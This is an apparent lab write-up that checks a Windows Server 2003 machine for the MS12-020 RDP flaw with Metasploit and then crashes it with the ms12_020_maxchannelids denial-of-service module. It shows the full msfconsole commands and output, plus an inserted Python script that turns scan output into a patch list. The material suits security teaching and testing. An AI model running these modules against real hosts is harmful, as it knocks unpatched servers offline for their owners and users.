Using Metasploit (MSF) to exploit the MS12-020 vulnerability in Windows
Preface
An attacker sends a series of specially crafted RDP packets to the affected system. The vulnerability can cause a denial of service or allow remote code execution. By default, the Remote Desktop Protocol (RDP, default port 3389) is not enabled on any Windows operating system. Systems that do not have RDP enabled are not at risk. This experiment causes a DoS on the target system.
0x01 Experimental environment
Attack machine: Kali Linux
IP: 192.168.8.130
Target machine: Windows Server 2003 Enterprise x64 SP2
IP: 192.168.8.129
0x02 Vulnerability verification
Use the MSF module auxiliary/scanner/rdp/ms12_020_check to verify whether the target machine has this vulnerability:
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis 'R3dy'
  Brandon McCann 'zeknox'

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability.
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse
After the module runs, the output shows that the target system has this vulnerability:
msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
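For patch triage across a range of hosts, the checker's saved console output can be reduced to a deduplicated list of hosts that need the MS12-020 update. The following is an added example, not part of the original page or of Metasploit; the function name `triage` and the sample text are assumptions, and only the two line formats shown above are parsed.

```python
import ipaddress
import re

# Constructed sample in the format shown above. 192.168.8.131 is a made-up
# second host, and one line is repeated to exercise deduplication.
SAMPLE_OUTPUT = """\
[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[+] 192.168.8.131:3389 - 192.168.8.131:3389 - The target is vulnerable.
[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Unanchored patterns, so output whose line breaks were lost still parses.
VULN_RE = re.compile(
    r"\[\+\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+\S+\s+-\s+"
    r"The target is vulnerable\."
)
PROGRESS_RE = re.compile(r"\[\*\]\s+Scanned (\d+) of (\d+) hosts")


def triage(text):
    """Return (sorted unique vulnerable (host, port) pairs, scan_complete)."""
    vulnerable = set()
    for m in VULN_RE.finditer(text):
        try:
            ipaddress.ip_address(m.group(1))  # reject values such as 999.1.1.1
        except ValueError:
            continue
        vulnerable.add((m.group(1), int(m.group(2))))
    # Only the last progress line counts. A partial scan must not be read as
    # "every host not listed is fine".
    progress = PROGRESS_RE.findall(text)
    complete = bool(progress) and progress[-1][0] == progress[-1][1]
    ordered = sorted(vulnerable,
                     key=lambda hp: (ipaddress.ip_address(hp[0]), hp[1]))
    return ordered, complete


if __name__ == "__main__":
    hosts, complete = triage(SAMPLE_OUTPUT)
    for host, port in hosts:
        print(f"{host}:{port} needs the MS12-020 update or RDP disabled")
    if not complete:
        print("warning: scan did not finish; the host list is incomplete")
```

A result with `complete` set to false means the scan should be rerun before any unlisted host is treated as unaffected.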
0x03 Exploitation
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.8.129    yes       The target address
  RPORT  3389             yes       The target port (TCP)

msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed
After the module runs, the target Windows Server 2003 system crashes with a BSOD.